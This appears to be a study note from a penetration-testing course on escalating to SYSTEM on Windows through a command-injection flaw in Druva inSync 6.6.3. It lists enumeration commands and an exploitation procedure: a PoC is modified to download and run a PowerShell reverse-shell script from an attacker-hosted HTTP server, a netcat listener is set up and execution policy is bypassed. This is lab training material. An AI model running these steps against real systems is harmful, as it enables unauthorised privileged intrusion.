17.Vulnerable-services
Enumeration Commands
Exploitation (Setup) Commands
Verification Commands
Key Concepts:
Third-Party Vulnerabilities:
User-installed software can introduce security flaws.
Services running as SYSTEM are high-value targets.
Druva inSync Vulnerability:
Specific versions (e.g., 6.6.3) are vulnerable to command injection via RPC.
Allows arbitrary command execution as NT AUTHORITY\SYSTEM.
Approach, Commands, Tools, and Techniques:
Enumeration:
wmic product get name
(Identify installed applications).netstat -ano | findstr 6064
(Verify listening port).get-process -Id 3324
(Map PID to process name).get-service | ? {$_.DisplayName -like 'Druva*'}
(Confirm service status).
Exploitation:
Modify the provided PowerShell PoC script:
Change the
$cmd
variable to execute a reverse shell.Download
Invoke-PowerShellTcp.ps1
(or similar).Host
Invoke-PowerShellTcp.ps1
usingpython3 -m http.server
.Modify the PoC to download and execute
Invoke-PowerShellTcp.ps1
.
Start a Netcat listener on the attacker machine:
nc -lvnp 9443
.Bypass PowerShell execution policy:
Set-ExecutionPolicy Bypass -Scope Process
.Execute the modified PowerShell PoC script.
Verification:
whoami
(Verify SYSTEM privileges).hostname
(Verify target host).
Commands:
wmic product get name
netstat -ano | findstr 6064
get-process -Id <PID>
get-service | ? {$_.DisplayName -like 'Druva*'}
python3 -m http.server <port>
nc -lvnp <port>
Set-ExecutionPolicy Bypass -Scope Process
whoami
hostname
Last updated